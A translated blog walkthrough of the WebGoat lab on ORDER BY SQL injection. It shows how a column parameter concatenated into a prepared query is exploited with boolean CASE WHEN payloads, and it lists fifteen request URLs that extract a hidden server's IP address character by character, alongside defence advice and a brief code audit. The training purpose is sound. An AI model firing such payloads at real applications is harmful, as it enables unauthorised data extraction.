SQL injection - precompiled CASE injection

Others 2023-09-29 19:13:11 views: null

Article directory

Precompiled CASE injection

Precompiled CASE (Prepared CASE) is a control statement in a database query language (such as SQL). It can select and execute different statement blocks based on the value of a conditional expression, similar to a switch statement in a programming language. Precompiled CASE injection is a security vulnerability attack based on precompiled CASE statements.

The vulnerability principle of precompiled CASE injection attacks is similar to other types of injection attacks, that is, the attacker tries to construct specific input data to bypass the input validation and filtering mechanism of the application, thereby being able to perform unauthorized operations or obtain sensitive information, etc. .

In precompiled CASE injection attacks, attackers usually attack queries with conditional judgment statements that exist in the application. They bypass the input validation and filtering mechanisms by constructing malicious conditional expressions, allowing the results of the conditional expressions to reach the target of the attack. Purpose.

1. SQL injection vulnerability defense

  • To avoid using splicing to construct SQL statements, you can use pre-compilation and other technologies.

  • Perform adequate filtering on the parameters entering the SQL statement.

  • Deploy security devices such as WAF (web application security firewall).

  • Many current development frameworks have basically solved the SQL injection problem technically.

PreparedStatement in JAVA, PreparedStatement inherits from Statement.

The role of PreparedStatement: Precompile SQL statements and execute them: Prevent SQL injection problems.

PreparedStatement benefits:

  • Pre-compiled SQL for higher performance.
  • Prevent SQL injection: escape sensitive characters.

image-20210725195756848

The Java code operation database process is as shown in the figure:

  • Send SQL statements to the MySQL server

  • The MySQL server will operate the SQL statement

    • Check the SQL statement and check whether the syntax of the SQL statement is correct

    • Compile SQL statements. Compile SQL statements into executable functions

      Checking the SQL and compiling the SQL takes longer than executing the SQL.

      If we just reset the parameters, checking the SQL statement and compiling the SQL statement will not need to be repeated. This improves performance.

    • Execute SQL statements.

As the saying goes, there is no absolute security, and pre-compiled technology cannot completely prevent SQL injection, it can only mitigate it.

For example, the parameter binding method can be bypassed in the following way: by using the case when statement, a select statement can be added to the orderExpression expression after order by.

The prerequisite is that there must be an order by field in the SQL statement before it can be injected through precompiled CASE.

2. WEBGOAT SQL injection

2.1 WebGoat 8.0

Download address: https://github.com/WebGoat/WebGoat/wiki
WebGoat official website and usage: https://github.com/WebGoat/WebGoat

Run WebGoat

implement:java -jar webgoat-server-8.0.0.M21.jar

image-20230924145350643

Then, execute: in the browser http://127.0.0.1:8080/WebGoat, open the WebGoat website, and you can use it after registering as a user.

2.2 Order by injection

Start the shooting range and access the specified page

image-20230924130939131

The question requires obtaining the IP address of the server whose host name is webgoat-prd, and the question prompts that there is no SQL injection in Submit.

See WebGoat's tips to use the when condition when (true/false).

image-20230924135135373

Use bp to capture data packets and click on the IP sorting place to capture the packets.

image-20230924145029497

View packets

image-20230924132252948

Sort by different columns

  • Sort by IP:

image-20230924132411561

  • Sort by hostname:

image-20230924132442557

Think of the value of the column parameter as the order by parameter in the SQL statement.

It is found here that the value of the column parameter is controllable, so we can pass a value at will and check the result returned by the browser.

image-20230924132713555

Found an error message

image-20230924132843911

Carefully observe the error message and find that there is an SQL statement in it

select id, hostname, ip, mac, status, description from servers where status <> 'out of order' order by wuhu

It is found that the value wuhu passed to column is ultimately the parameter of order by. And also gives a lot of database information. For example, there are id, hostname, ip, mac, status, description, the table name is servers, and the query is for information whose status is not 'out of order'. It can be inferred that the status of the server with the host name webgoat-prd is 'out of order', so normal query cannot find the server with the host name webgoat-prd.

Using case when for injection, the entire SQL statement is:

select id, hostname, ip, mac, status, description from servers where status <> 'out of order' order by case when (true/false) then hostname else id end

Note : If the condition in when is true, sort by hostname, otherwise sort by id.

Note :

  • The column names after then and else must be legal, otherwise the SQL statement will return an error.
  • There must be end at the end of the case statement.
2.2.1 Conditions for constructing when

Get the IP address of the server with hostname webgoat-prd:

select ip from servers where hostname='webgoat-prd'

Determine whether the first bit is 1:

substring((select ip from servers where hostname='webgoat-prd'),1,1)=1

The SUBSTRING function is used to get a substring from a string.

Put the entire judgment condition into when, and the entire URL is:

127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when (substring((select ip from servers where hostname='webgoat-prd'),1,1)=1) then hostname else id end)

Then URL-encode the constructed parameters and send the package. You can see that the results are sorted by hostname, indicating that the first digit of the IP address is 1.

image-20230924135534378

The second bit is 0

image-20230924140954214

The third place is 4

image-20230924141038591

All SQL statements when the condition is true are:

Note : cannot be copied directly into bp, URL encoding is required.

127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,1,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,2,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,3,1) from servers where hostname='webgoat-prd')=4) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,4,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,5,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,6,1) from servers where hostname='webgoat-prd')=3) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,7,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,8,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,9,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,10,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,11,1) from servers where hostname='webgoat-prd')=9) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,12,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,13,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,14,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,15,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)

Finally, you can see that the IP address is 104.130.219.202

Finally, enter the obtained IP address into the page, that is, the customs clearance is successful.

image-20230924143130613

2.2.2 Code audit

Locating Servers.javathe file and analyzing the source code, we can see that although the server uses precompilation, it still splices the order by parameter column, resulting in a SQL injection vulnerability:

image-20230924143354707

Guess you like

Origin blog.csdn.net/weixin_58783105/article/details/133271537
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com